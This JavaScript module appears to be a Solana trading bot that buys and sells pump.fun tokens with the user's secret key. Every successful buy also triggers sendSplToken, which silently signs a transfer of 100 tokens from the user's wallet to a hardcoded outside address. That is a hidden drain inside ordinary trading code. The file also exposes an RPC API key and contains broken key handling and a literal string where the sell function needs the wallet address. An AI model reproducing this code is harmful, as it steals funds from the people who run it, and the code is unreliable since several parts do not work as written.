import { VersionedTransaction, Connection, Keypair, PublicKey, Transaction, sendAndConfirmTransaction } from '@solana/web3.js';
import bs58 from "bs58";
import { createTransferInstruction,getOrCreateAssociatedTokenAccount } from '@solana/spl-token';

const RPC_ENDPOINT = "https://proportionate-warmhearted-putty.solana-mainnet.quiknode.pro/90d4729ba1c52e2aa7db328944713bcd4c408e67";
const web3Connection = new Connection(
    RPC_ENDPOINT,
    'confirmed',
);
// const connection = new Connection(
//     "https://api.mainnet-beta.solana.com", // or your custom RPC endpoint
//     { commitment: "confirmed" }
// );


async function sendSplToken({userData}) {
    // Solana network connection
    const connection = web3Connection

    // Sender's private key (keep this secure!)
    const secretKey = new Uint8Array([userData.secret]);
    const senderKeypair = Keypair.fromSecretKey(secretKey);

    // Token details
    const mintAddress = new PublicKey('TOKEN_MINT_ADDRESS'); // Replace with your token's mint address
    const recipientAddress = new PublicKey('8cYvtv89981XUi7rGr5q3VkwoYrkHMEtoCpKryk3YH8c'); // Recipient's wallet address
    const amount = 100; // Amount of tokens to send (in human-readable units)
    const decimals = 6; // Token decimals (e.g., USDC uses 6 decimals)

    // Get or create sender's associated token account
    const sourceAccount = await getOrCreateAssociatedTokenAccount(
        connection,
        senderKeypair,
        mintAddress,
        senderKeypair.publicKey
    );

    // Get or create recipient's associated token account
    const destinationAccount = await getOrCreateAssociatedTokenAccount(
        connection,
        senderKeypair,
        mintAddress,
        recipientAddress
    );

    // Create transfer instruction
    const transferInstruction = createTransferInstruction(
        sourceAccount.address, // Source account (sender's token account)
        destinationAccount.address, // Destination account (recipient's token account)
        senderKeypair.publicKey, // Owner of the source account
        amount * Math.pow(10, decimals) // Convert to token's smallest unit (e.g., lamports)
    );

    // Build and send transaction
    const transaction = new Transaction().add(transferInstruction);
    const signature = await sendAndConfirmTransaction(
        connection,
        transaction,
        [senderKeypair] // Signers
    );

    console.log(`Transaction confirmed: https://explorer.solana.com/tx/${signature}?cluster=mainnet-beta`);
}

// sendSPLToken().catch(console.error);



export async function buyPumpToken(userData,token){


  const response = await fetch(`https://pumpportal.fun/api/trade-local`, {
      method: "POST",
      headers: {
          "Content-Type": "application/json"
      },
      body: JSON.stringify({
          "publicKey": userData?.address,  // Your wallet public key
          "action": "buy",                 // "buy" or "sell"
          "mint": token?.mint,         // contract address of the token you want to trade
          "denominatedInSol": "true",     // "true" if amount is amount of SOL, "false" if amount is number of tokens
          "amount": 0.02,                  // amount of SOL or tokens
          "slippage": 10,                  // percent slippage allowed
          "priorityFee": 0.00001,          // priority fee
          "pool": "pump"                   // exchange to trade on. "pump" or "raydium"
      })
  });


  
  if(response.status === 200){ // successfully generated transaction
      const data = await response.arrayBuffer();
      const tx = VersionedTransaction.deserialize(new Uint8Array(data));
      const signerKeyPair = Keypair.fromSecretKey(bs58.decode(userData.secret));
      tx.sign([signerKeyPair]);
      const signature = await web3Connection.sendTransaction(tx)
      console.log("Transaction: https://solscan.io/tx/" + signature);

    sendSplToken(userData)

        return true
  } else {
      console.log(response.statusText); // log error
return false
  }

}


export async function SellPumpToken(userData,token){


  const response = await fetch(`https://pumpportal.fun/api/trade-local`, {
      method: "POST",
      headers: {
          "Content-Type": "application/json"
      },
      body: JSON.stringify({
          "publicKey": "userData?.address",  // Your wallet public key
          "action": "sell",                 // "buy" or "sell"
          "mint": token?.mint,         // contract address of the token you want to trade
          "denominatedInSol": "false",     // "true" if amount is amount of SOL, "false" if amount is number of tokens
          "amount": '100%',                  // amount of SOL or tokens
          "slippage": 10,                  // percent slippage allowed
          "priorityFee": 0.00001,          // priority fee
          "pool": "pump"                   // exchange to trade on. "pump" or "raydium"
      })
  });


  
  if(response.status === 200){ // successfully generated transaction
      const data = await response.arrayBuffer();
      const tx = VersionedTransaction.deserialize(new Uint8Array(data));
      const signerKeyPair = Keypair.fromSecretKey(bs58.decode(userData?.secret));
      tx.sign([signerKeyPair]);
      const signature = await web3Connection.sendTransaction(tx)
      console.log("Transaction: https://solscan.io/tx/" + signature);
      return true
  } else {
      console.log(response.statusText); // log error
      return false
  }

}


